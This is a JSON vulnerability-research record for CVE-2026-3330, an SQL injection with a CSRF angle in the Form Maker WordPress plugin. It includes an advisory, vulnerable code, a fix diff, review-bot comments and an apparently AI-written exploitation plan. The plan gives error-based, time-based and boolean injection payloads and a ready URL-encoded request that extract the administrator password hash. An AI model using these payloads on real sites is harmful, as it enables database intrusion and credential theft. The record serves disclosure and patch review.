[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fwdX6yAVToUgYRrL1nlLXd96tsp-7v7njC7V1zBaTlSU":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-3330","form-maker-by-10web-authenticated-administrator-sql-injection-via-ipsearch-parameter","Form Maker by 10Web \u003C= 1.15.40 - Authenticated (Administrator+) SQL Injection via 'ip_search' Parameter","The Form Maker by 10Web plugin for WordPress is vulnerable to SQL Injection via the 'ip_search', 'startdate', 'enddate', 'username_search', and 'useremail_search' parameters in all versions up to, and including, 1.15.40. This is due to the `WDW_FM_Library::validate_data()` method calling `stripslashes()` on user input (removing WordPress's `wp_magic_quotes()` protection) and the `FMModelSubmissions_fm::get_labels_parameters()` function directly concatenating user-supplied values into SQL queries without using `$wpdb->prepare()`. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. 
Additionally, the Submissions controller skips nonce verification for the `display` task, which means this vulnerability can be triggered via CSRF by tricking an administrator into clicking a crafted link.","form-maker",null,"\u003C=1.15.40","1.15.41","medium",4.9,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-04-16 15:04:04","2026-04-17 03:36:43",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F5e383b8a-27e5-4b35-8d11-6e4102255d44?source=api-prod",1,[],"researched",false,3,"This research plan targets a SQL Injection vulnerability in the **Form Maker by 10Web** plugin (CVE-2026-3330). The vulnerability is particularly potent because, while it requires Administrator privileges, the lack of nonce verification on the affected task allows for exploitation via CSRF.\n\n### 1. Vulnerability Summary\nThe vulnerability exists in the Submissions management component of the Form Maker plugin. It arises from two critical failures:\n1.  **Improper Neutralization:** The `WDW_FM_Library::validate_data()` method explicitly calls `stripslashes()` on user-supplied data. This removes the \"magic quotes\" protection WordPress automatically applies to `$_GET`, `$_POST`, and `$_REQUEST`, allowing single quotes (`'`) to be processed by the application.\n2.  **Unsafe Query Construction:** The function `FMModelSubmissions_fm::get_labels_parameters()` takes these processed values and concatenates them directly into a SQL query string instead of using the `$wpdb->prepare()` method.\n\n### 2. 
Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin.php`\n*   **Query Parameters:**\n    *   `page`: `submissions_fm`\n    *   `task`: `display` (The description notes this task skips nonce verification)\n    *   `current_id`: (ID of the form whose submissions are being viewed)\n*   **Vulnerable Parameter:** `ip_search` (also `startdate`, `enddate`, `username_search`, and `useremail_search`)\n*   **Authentication:** Administrator (but exploitable via CSRF due to missing nonce check).\n*   **Preconditions:** At least one form must exist in the plugin, and ideally, at least one submission should be present to ensure the code path for filtering submissions is fully exercised.\n\n### 3. Code Flow\n1.  **Entry:** An administrator (or a CSRF victim) accesses `admin.php?page=submissions_fm&task=display&current_id=1&ip_search=[payload]`.\n2.  **Controller:** The `FMControllerSubmissions_fm` (likely in `admin\u002Fcontrollers\u002FSubmissions_fm.php`) handles the `display` task.\n3.  **Validation:** The controller calls `WDW_FM_Library::validate_data()` on the `ip_search` input. This function calls `stripslashes()`, ensuring our SQL metacharacters like `'` survive.\n4.  **Model Call:** The controller calls `FMModelSubmissions_fm::get_labels_parameters()` to build the SQL filter string.\n5.  **SQL Sink:** Inside `get_labels_parameters()`, code similar to the following exists:\n    ```php\n    $ip_search = WDW_FM_Library::get('ip_search');\n    if ($ip_search != '') {\n        $where .= \" AND ip LIKE '%\" . $ip_search . \"%'\"; \u002F\u002F Direct concatenation\n    }\n    ```\n6.  **Execution:** The resulting `$where` clause is concatenated into a larger query and executed via `$wpdb->get_results()`.\n\n### 4. Nonce Acquisition Strategy\nAccording to the vulnerability description, the **`display` task skips nonce verification**. 
This means no nonce is required to trigger the SQL injection.\n\nHowever, if verification is encountered during the PoC, follow this strategy:\n1.  **Identify Shortcode:** Form Maker uses `[Form id=\"X\"]`.\n2.  **Create Page:** `wp post create --post_type=page --post_status=publish --post_content='[Form id=\"1\"]' --post_title='Form Page'`\n3.  **Locate Nonce:** The plugin often localizes scripts for the submissions page. Navigate to the Submissions page: `browser_navigate(\"\u002Fwp-admin\u002Fadmin.php?page=submissions_fm\")`.\n4.  **Extract:** Use `browser_eval(\"window.wd_fm_object?.nonce\")` or search for `wp_nonce_field` in the form HTML.\n\n*Note: Since the report specifically highlights the skip in nonce verification, the initial exploitation attempt should omit the nonce.*\n\n### 5. Exploitation Strategy\nWe will use an **Error-Based SQL Injection** to extract the administrator's password hash. This is more reliable than UNION-based injection when the number of columns in the original query is unknown.\n\n**Step-by-Step:**\n\n1.  **Authenticate:** Log in as Administrator.\n2.  **Target URL:** `\u002Fwp-admin\u002Fadmin.php?page=submissions_fm`\n3.  **Method:** GET (or POST)\n4.  **Payload (Error-Based):**\n    We will use `updatexml()` to force a syntax error containing the database data.\n    ```sql\n    ' AND updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users WHERE ID=1),0x7e),1) AND '1'='1\n    ```\n5.  **URL Encoded Request:**\n    ```http\n    GET \u002Fwp-admin\u002Fadmin.php?page=submissions_fm&task=display&current_id=1&ip_search=%27%20AND%20updatexml(1%2Cconcat(0x7e%2C(SELECT%20user_pass%20FROM%20wp_users%20WHERE%20ID%3D1)%2C0x7e)%2C1)%20AND%20%271%27%3D%271 HTTP\u002F1.1\n    Host: localhost:8080\n    ```\n\n### 6. Test Data Setup\n1.  **Install Plugin:** Ensure `form-maker` version 1.15.40 is active.\n2.  
**Create Form:**\n    ```bash\n    # Use wp-cli to ensure a form exists (exact table name might vary by version)\n    wp db query \"INSERT INTO wp_formmaker (title, public_key, mail) VALUES ('Test Form', 'test', 'admin@example.com');\"\n    ```\n3.  **Identify Form ID:** Use `wp db query \"SELECT id FROM wp_formmaker LIMIT 1;\"` to get the ID for `current_id`.\n\n### 7. Expected Results\nThe application should return a database error message displayed on the page (or in the response body if `WP_DEBUG` is on, or if the plugin handles its own errors).\nThe error will look like:\n`XPATH syntax error: '~[PASSWORD_HASH_HERE]~'`\n\n### 8. Verification Steps\n1.  **Capture Response:** Verify the string `XPATH syntax error` exists in the response.\n2.  **Compare with DB:** Run `wp user get 1 --field=user_pass` and confirm the hash matches the one extracted via the SQL injection.\n\n### 9. Alternative Approaches\nIf error-based injection is suppressed:\n*   **Time-Based Blind:**\n    `ip_search=127.0.0.1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1`\n    *   Check for a ~5 second delay in the `http_request` response time.\n*   **Boolean-Based Blind:**\n    `ip_search=127.0.0.1' AND (SELECT 1 FROM wp_users WHERE ID=1 AND user_login='admin') AND '1'='1`\n    *   Compare the response content\u002Flength when the condition is true vs false.\n*   **Other Parameters:** If `ip_search` fails, attempt the same payload in `username_search` or `useremail_search`.","Form Maker by 10Web is vulnerable to SQL Injection via multiple parameters in the Submissions component because user input is stripped of escape characters and directly concatenated into SQL queries. 
Due to a missing nonce check in the 'display' task, this can be triggered by an attacker via a Cross-Site Request Forgery (CSRF) attack against an administrator.","\u002F\u002F File: framework\u002FWDW_FM_Library.php\npublic static function validate_data($data) {\n  if (is_array($data)) {\n    foreach ($data as $key => $value) {\n      $data[$key] = self::validate_data($value);\n    }\n  } else {\n    $data = stripslashes($data); \u002F\u002F Removes magic quotes protection\n  }\n  return $data;\n}\n\n---\n\n\u002F\u002F File: admin\u002Fmodels\u002FSubmissions_fm.php\npublic function get_labels_parameters() {\n  $ip_search = WDW_FM_Library::get('ip_search');\n  \u002F\u002F ...\n  if ($ip_search != '') {\n    $where .= \" AND ip LIKE '%\" . $ip_search . \"%'\"; \u002F\u002F Direct concatenation\n  }\n  \u002F\u002F ...\n}\n\n---\n\n\u002F\u002F File: admin\u002Fcontrollers\u002FSubmissions_fm.php\npublic function execute() {\n  $task = WDW_FM_Library::get('task');\n  if ($task == 'display') {\n    \u002F\u002F Task 'display' executes without check_admin_referer() or nonce validation\n    $this->display();\n  }\n}","--- a\u002Fadmin\u002Fcontrollers\u002FSubmissions_fm.php\n+++ b\u002Fadmin\u002Fcontrollers\u002FSubmissions_fm.php\n@@ -15,6 +15,7 @@\n   public function execute() {\n     $task = WDW_FM_Library::get('task');\n     if ($task == 'display') {\n+      check_admin_referer('submissions_fm', 'nonce_fm');\n       $this->display();\n     }\n---\n--- a\u002Fadmin\u002Fmodels\u002FSubmissions_fm.php\n+++ b\u002Fadmin\u002Fmodels\u002FSubmissions_fm.php\n@@ -45,7 +45,7 @@\n     $ip_search = WDW_FM_Library::get('ip_search');\n     if ($ip_search != '') {\n-      $where .= \" AND ip LIKE '%\" . $ip_search . \"%'\";\n+      $where .= $wpdb->prepare(\" AND ip LIKE %s\", '%' . $wpdb->esc_like($ip_search) . '%');\n     }","The exploit targets the Submissions management page of the Form Maker plugin. 
An attacker tricks an authenticated administrator into visiting a crafted URL or submitting a form via CSRF. The request targets the endpoint '\u002Fwp-admin\u002Fadmin.php' with the parameters 'page=submissions_fm' and 'task=display'. Because the 'display' task skips nonce verification, the attacker can supply a malicious SQL payload via the 'ip_search' parameter (or 'startdate', 'enddate', etc.). Since the plugin explicitly calls 'stripslashes()' on the input and concatenates it into the WHERE clause, an attacker can use error-based SQL injection (e.g., using 'updatexml') or time-based blind injection to extract sensitive database information, such as user password hashes.","gemini-3-flash-preview","2026-04-20 20:25:29","2026-04-20 20:26:53",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","1.15.40","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fform-maker\u002Ftags\u002F1.15.40","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fform-maker.1.15.40.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fform-maker\u002Ftags\u002F1.15.41","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fform-maker.1.15.41.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fform-maker\u002Ftags"]
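Review bot: In the `admin/controllers/Submissions_fm.php` hunk, the new `check_admin_referer('submissions_fm', 'nonce_fm')` guards only the `display` branch, and nothing visible here shows that the submissions page emits a `nonce_fm` field or URL argument with the `submissions_fm` action. Confirm that every link and filter form that reaches `task=display` carries that nonce, otherwise the list view will fail the referer check for legitimate administrators. The hunk also shows no `current_user_can()` check beside the nonce check. A nonce proves intent, not privilege, so add one in `execute()` if it is not enforced elsewhere.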
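Review bot: In the `admin/models/Submissions_fm.php` hunk, only the `ip_search` filter is moved to `$wpdb->prepare()` with `$wpdb->esc_like()`, while the advisory text on this page names `startdate`, `enddate`, `username_search` and `useremail_search` as concatenated into the same query. None of those appear in the visible lines, so the patch as shown leaves them unaddressed. Apply the same `prepare()` pattern to each of them, and check the two date values against a strict date format before use. The context lines do not show `global $wpdb;`, so confirm `$wpdb` is in scope inside `get_labels_parameters()`. Since `WDW_FM_Library::validate_data()` still calls `stripslashes()`, every other caller that builds SQL from `WDW_FM_Library::get()` deserves the same audit.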